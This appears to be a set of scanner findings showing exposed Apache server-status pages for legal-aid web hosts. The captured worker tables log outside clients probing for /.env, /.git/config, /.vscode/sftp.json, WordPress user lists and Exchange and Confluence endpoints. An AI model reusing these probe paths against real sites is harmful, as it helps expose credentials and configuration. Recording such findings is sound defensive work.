70.132.4.67http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 30-233165403/3/11073K 0.7810234.20.23168.39 70.132.4.67http/1.1elearning.alas.org:8080GET /about HTTP/1.1 31-233165413/3/15283K 0.261250533.70.03158.29 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 32-233165464/4/12572K 0.13107.40.01147.66 70.132.4.67http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 33-233165474/4/9723W 0.13008.70.01153.60 70.132.4.67http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 34-233165485/5/12240K 0.00105.30.01134.03 70.132.4.67http/1.1secure.alas.org:8080GET /.env HTTP/1.1 35-233165493/3/9833K 0.78197235.50.23119.80 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 36-233165663/3/9794W 0.00303.10.00137.28 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 37-233165673/3/12113K 0.251285633.50.03140.63 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 38-233165683/3/11700K 0.8020235.50.23118.85 70.132.4.67http/1.1short.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 39-233165975/5/10161K 0.031757.10.01132.04 70.132.4.67http/1.1esign.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 40-233165981/1/10303W 0.00501.00.00101.27 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 41-233166070/0/4213W 0.23600.00.0042.15 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 42-2331660813/13/4797K 0.0804617.90.0250.63 70.132.4.89http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 43-233166091/1/4140W 0.00401.00.0029.54 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 44-233166104/4/1788K 0.11057010.30.0126.32 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 45-233166115/5/2762K 0.02005.90.0134.15 70.132.4.67http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 46-233166123/3/1980K 0.280259469.00.0718.16 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 47-233166130/1/2361_ 0.61056010.00.0238.65 70.132.4.89http/1.1events.alas.org:8080GET / HTTP/1.1 48-233166143/3/2890K 0.2712035.70.0336.56 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 49-233166150/1/2946_ 0.61054850.00.0827.69 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 50-233166160/1/2899_ 0.66055370.00.0935.84 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 51-233166533/3/1558K 0.251034.50.0323.84 70.132.4.67http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 52-233166546/6/2359K 0.340076.70.0726.40 70.132.4.89http/1.1elearning.alas.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea6a06bb73
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 11-Dec-2023 00:08:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 234 Parent Server MPM Generation: 233 Server uptime: 233 days 8 hours 24 minutes 19 seconds Server load: 3.05 0.64 0.21 Total accesses: 4485448 - Total Traffic: 55.3 GB CPU Usage: u54.78 s8.28 cu0 cs0 - .000313% CPU load .222 requests/sec - 2946 B/second - 12.9 kB/request 123 requests currently being processed, 13 idle workers KKWKKKWKKKWKKWKKKKKKKKKKKWKWKKKKKKKKWKKKWWKWKKWWKWWKKWKKKKKKWKKK KWKKWKWKKWWKKKKKKKWWWWKWWKKWKWKWKKKKKKKWKKKKWKK_KKKKKKKKKWK.C___ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-233160633/38/327491K 3.000033.92.104150.00 70.132.4.95http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-233159318/68/322980K 3.461048.70.614144.73 70.132.4.67http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-233160589/42/310262W 1.710052.20.374051.36 70.132.4.67http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 3-233156939/100/305275K 2.570090.00.903878.36 70.132.4.67http/1.1short.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 4-233160687/41/297246K 1.780013.30.433735.40 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 5-233164408/10/288157K 0.260049.00.093666.55 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-233164516/6/273015W 0.160011.50.013571.06 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 7-233163567/15/271794K 0.92007.60.113442.01 70.132.4.67http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 8-233164566/6/249301K 0.2409847.90.053420.76 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 9-233164575/5/245602K 0.2711947.10.052841.83 70.132.4.67http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 10-233158955/77/215155W 2.66306.51.892830.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 11-233163627/15/182735K 0.271011.00.052458.31 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 12-233164668/8/169990K 0.340059.30.062133.16 70.132.4.95http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 13-233164673/3/130529W 0.02307.40.011538.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 14-233154787/110/111197K 4.151193.34.081242.78 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 15-233164726/6/109010K 0.221012.60.011281.97 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 16-233164778/8/96958K 0.32072118.50.021143.66 70.132.4.95http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 17-233164864/4/50695K 0.8210241.10.24619.35 70.132.4.67http/1.1esign.alas.org:8080GET /.env HTTP/1.1 18-233164875/5/40072K 0.021276.60.01468.06 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 19-233164926/6/38747K 0.0201197.60.01507.05 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 20-2331649710/10/35310K 0.8700247.80.24446.48 70.132.4.89http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 21-233165025/5/33837K 0.01106.70.01464.83 70.132.4.67http/1.1on.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 22-233165036/6/34478K 0.00006.30.01401.93 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-233165085/5/34489K 0.08109.90.01412.76 70.132.4.67http/1.1on.alas.org:8080GET /config.json HTTP/1.1 24-233165096/6/31139K 0.01007.40.01324.43 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 25-233165274/4/13284W 0.03009.70.01217.38 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 26-233165284/4/11570K 0.14119.80.01187.29 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-233165333/3/13515W 0.7700234.20.23180.83 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 28-233165385/5/14265K 0.00105.60.01156.11 70.132.4.67http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 29-233165394/4/10096K 0.091012.70.01141.48 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 30-233165403/3/11073K 0.7800234.20.23168.39 70.132.4.67http/1.1elearning.alas.org:8080GET /about HTTP/1.1 31-233165413/3/15283K 0.260250533.70.03158.29 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 32-233165464/4/12572K 0.13107.40.01147.66 70.132.4.67http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 33-233165474/4/9723K 0.13108.70.01153.60 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 34-233165485/5/12240K 0.00105.30.01134.03 70.132.4.67http/1.1secure.alas.org:8080GET /.env HTTP/1.1 35-233165493/3/9833K 0.78097235.50.23119.80 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 36-233165663/3/9794W 0.00203.10.00137.28 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 37-233165673/3/12113K 0.250285633.50.03140.63 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 38-233165683/3/11700K 0.8010235.50.23118.85 70.132.4.67http/1.1short.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 39-233165975/5/10161K 0.030757.10.01132.04 70.132.4.67http/1.1esign.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 40-233165981/1/10303W 0.00401.00.00101.27 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 41-233166070/0/4213W 0.23500.00.0042.15 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 42-2331660813/13/4797K 0.0804617.90.0250.63 70.132.4.89http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 43-233166091/1/4140W 0.00301.00.0029.54 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 44-233166104/4/1788K 0.11057010.30.0126.32 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 45-233166114/4/2761K 0.02104.80.0034.15 70.132.4.67http/1.1short.alas.org:8080GET /_all_dbs HTTP/1.1 46-233166122/2/1979W 0.01102.10.0018.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 47-233166130/0/2360W 0.33500.00.0038.63 70.132.4.89http/1.1events.alas.org:8080GET / HTTP/1.1 48-233166143/3/2890K 0.2702035.70.0336.56 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 49-233166150/0/2945W 0.00500.00.0027.61 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 50-233166160/0/2898W 0.00500.00.0035.76 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 51-233166533/3/1558K 0.251034.50.0323.84 70.132.4.67http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 52-233166546/6/2359K 0.340076.70.0726.40 70.132.4.89http/1.1elearning.alas.org:8080GET /.env HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea35605e62
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 17-Nov-2023 02:36:16 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 210 Parent Server MPM Generation: 209 Server uptime: 209 days 10 hours 52 minutes 17 seconds Server load: 0.08 0.02 0.01 Total accesses: 3517116 - Total Traffic: 48.3 GB CPU Usage: u149.76 s17.31 cu0 cs0 - .000923% CPU load .194 requests/sec - 2867 B/second - 14.4 kB/request 14 requests currently being processed, 11 idle workers KKK_K_KKKWKKKCW_________..................K..................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-209186947/7/256200K 0.000107.60.013569.54 15.158.40.169http/1.1secure.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-2091848211/19/249912K 0.850281159.20.293618.96 70.132.1.81http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 2-209180058/27/238636K 2.741365156.00.473528.33 70.132.1.81http/1.1events.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-209186160/3/238558_ 0.1102610.00.013367.72 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1700188570.47223496437072753906 4-2091803111/28/231412K 1.380072.40.823245.16 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-209180260/24/222717_ 0.8324600.00.853171.42 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 6-209186212/4/213172K 1.36090867.70.123142.62 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 7-209186229/11/212936K 0.052012.80.072995.59 70.132.1.81http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 8-209186311/3/194645K 0.6037421.10.012979.61 130.176.137.97http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1700188571.904525041580200 9-2091749713/73/191582W 11.470018.11.252468.20 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 10-209187002/2/169916K 1.350102367.90.072463.27 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 11-209187012/2/144299K 0.0912272.00.002140.16 70.132.1.81http/1.1events.alas.org:8080GET /about HTTP/1.1 12-209187105/5/138795K 0.00009.50.011892.15 15.158.40.169http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 13-209187111/1/99419C 0.00000.20.001340.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-209187160/0/86119W 0.00000.00.001087.71 70.132.4.67http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 15-209187210/0/87704_ 0.00200.00.001133.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-209187300/0/72081_ 1.62100.00.00984.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-209187310/0/40936_ 0.00100.00.00559.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-209187360/0/32081_ 0.00100.00.00415.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-209187410/0/30672_ 0.00100.00.00457.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-209187420/0/27336_ 0.00100.00.00394.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-209187470/0/26058_ 0.00100.00.00420.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-209187520/0/25944_ 0.00100.00.00346.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-209187570/0/26839_ 0.00100.00.00370.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-209-0/0/23934. 0.00345300.00.00274.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-209-0/0/11935. 0.00344700.00.00198.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-209-0/0/10540. 0.00344800.00.00179.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-209-0/0/12093. 0.00344300.00.00166.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-209-0/0/11383. 0.00343700.00.00135.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-209-0/0/8798. 0.00343200.00.00132.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-209-0/0/9344. 0.00344400.00.00137.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-209-0/0/9069. 0.00343500.00.00123.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-209-0/0/11162. 0.00343600.00.00139.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-209-0/0/8804. 0.00343900.00.00144.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-209-0/0/8788. 0.00344600.00.00107.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-209-0/0/7869. 0.00344000.00.00104.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-209-0/0/8284. 0.00344500.00.00128.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-209-0/0/11010. 0.00344200.00.00131.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-209-0/0/8455. 0.00344100.00.00100.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-209-0/0/8702. 0.01343400.00.00120.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-209-0/0/7066. 0.00343800.00.0078.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-209-0/0/4064. 0.00346700.00.0039.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-209181931/22/4406K 1.64315.10.2548.96 70.132.1.136http/1.1on.alas.org:8080GET /server-status HTTP/1.1 43-209-0/0/4049. 0.00346600.00.0028.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-209-0/0/1619. 0.00349400.00.0017.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-209-0/0/2523. 0.00349300.00.0032.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-209-0/0/1763. 0.00349200.00.0015.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-209-0/0/1667. 0.00349100.00.0028.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-209-0/0/2830. 0.00348900.00.0036.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-209-0/0/2489. 0.00349000.00.0025.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-209-0/0/2807. 0.00348800.00.0035.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-209-0/0/1462. 0.00348700.00.0020.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-209-0/0/1770. 0.00348600.00.0023.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-209-0/0/1754. 0.00348500.00.0022.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-209-0/0/1289. 0.00348400.00.0025.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-209-0/0/1384. 0.00348300.00.0015.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS *
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fead71b0bed
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 06-Nov-2023 04:09:44 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 199 Parent Server MPM Generation: 198 Server uptime: 198 days 12 hours 25 minutes 46 seconds Server load: 0.07 0.02 0.00 Total accesses: 3384013 - Total Traffic: 46.2 GB CPU Usage: u164.56 s19.2 cu0 cs0 - .00107% CPU load .197 requests/sec - 2894 B/second - 14.3 kB/request 13 requests currently being processed, 1 idle workers KKKKKWKKWK_.K.KK................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-198106825/15/246756K 1.630068.30.153417.50 15.158.40.169http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 1-198105353/22/240780K 1.73003.20.233460.66 15.158.40.169http/1.1secure.alas.org:8080GET /.env HTTP/1.1 2-198109497/7/229871K 0.000011.90.013370.84 15.158.40.169http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 3-198107621/6/229256K 0.66100.70.033194.93 64.252.66.89http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Permanent-Parenting-Plan-LONG-D 4-198108118/11/223606K 1.06108.30.013118.84 70.132.1.81http/1.1on.alas.org:8080GET /config.json HTTP/1.1 5-198106886/14/214521W 0.63006.30.073020.49 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 6-198108123/6/203964K 1.620371134.60.152996.79 70.132.4.67http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 7-198109551/1/204941K 0.0802591.00.002857.43 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1699243783.21535992622375488281 8-198109600/0/186806W 0.00000.00.002865.58 70.132.4.67http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-198998811/37/183553K 0.441019.10.132342.67 70.132.1.81http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 10-198109610/0/162979_ 0.13000.00.002345.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-198-0/0/137599. 0.00119700.00.002035.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-198107869/15/132582K 0.041013.60.021794.02 70.132.1.81http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-198-0/0/96291. 0.00119800.00.001292.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-198106981/12/82476K 0.38138966.80.131045.18 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 15-198107037/15/84370K 1.1301152241.20.351090.75 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 16-198-0/0/69034. 0.0099200.00.00940.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-198-0/0/39008. 0.00142300.00.00532.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-198-0/0/31383. 0.00142200.00.00406.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-198-0/0/29817. 0.00142100.00.00446.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-198-0/0/26634. 0.00142000.00.00384.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-198-0/0/25344. 0.00141700.00.00410.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-198-0/0/25080. 0.00141800.00.00334.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-198-0/0/25250. 0.00141900.00.00345.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-198-0/0/23115. 0.00141600.00.00262.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-198-0/0/11693. 2.801095300.00.00195.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-198-0/0/10122. 3.141095400.00.00170.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-198-0/0/11853. 0.99960000.00.00162.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-198-0/0/10973. 2.60868900.00.00128.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-198-0/0/8468. 6.89519400.00.00127.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-198-0/0/9025. 3.751095800.00.00131.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-198-0/0/8907. 0.001265900.00.00121.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-198-0/0/10847. 0.001265800.00.00136.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-198-0/0/8504. 0.001265700.00.00141.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-198-0/0/8561. 0.001265600.00.00105.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-198-0/0/7623. 0.001265500.00.00102.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-198-0/0/7909. 0.001265400.00.00122.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-198-0/0/10786. 0.001265300.00.00128.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-198-0/0/8215. 3.76959400.00.0096.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-198-0/0/8418. 0.001265200.00.00118.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-198-0/0/6902. 0.001265100.00.0076.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-198-0/0/3932. 3.306909700.00.0038.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-198-0/0/4361. 0.007544700.00.0048.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-198-0/0/4029. 0.007544800.00.0028.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-197-0/0/1601. 0.0016237200.00.0017.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-197-0/0/2488. 0.0016237400.00.0032.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-197-0/0/1739. 0.0016236100.00.0015.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-197-0/0/1644. 0.0016236000.00.0028.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-197-0/0/2746. 0.0016235900.00.0035.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-197-0/0/2474. 0.0016235800.00.0025.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-197-0/0/2644. 0.0016235700.00.0033.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-197-0/0/1389. 0.9016235300.00.0018.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-197-0/0/1619. 0.3716235600.00.0022.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-197-0/0/1664. 0.0016241900.00.0021.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-197-0/0/1264. 0.0016241800.00.0025.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-197-0/0/1228. 0.0016241700.00.0012.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-197-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaa576d952
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 26-Oct-2023 16:05:42 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 189 Parent Server MPM Generation: 188 Server uptime: 188 days 21 minutes 43 seconds Server load: 0.18 0.06 0.01 Total accesses: 3139670 - Total Traffic: 43.7 GB CPU Usage: u124.68 s16.86 cu.09 cs.08 - .000872% CPU load .193 requests/sec - 2891 B/second - 14.6 kB/request 12 requests currently being processed, 1 idle workers KWKKKKKK_KKKK................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-188115311/15/228156K 3.53101.00.093238.47 70.132.1.81http/1.1on.alas.org:8080GET / HTTP/1.1 1-188110487/40/223569W 11.820011.50.733280.37 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 2-188110647/37/211965K 11.29007.30.833174.73 15.158.40.169http/1.1secure.alas.org:8080GET /.env HTTP/1.1 3-188116332/23/211572K 2.8507371.90.192990.51 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-188116389/15/206840K 3.110047.90.262942.39 15.158.40.169http/1.1short.alas.org:8080GET /.env HTTP/1.1 5-188116894/4/199047K 0.00004.20.002852.89 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 6-188116941/1/189480K 0.00001.10.002825.28 15.158.40.137http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 7-188116391/13/191696K 1.7501347231.60.522715.93 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 8-188116950/0/173111_ 2.94000.00.002723.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-188116111/14/170913K 3.8603651.37.832212.01 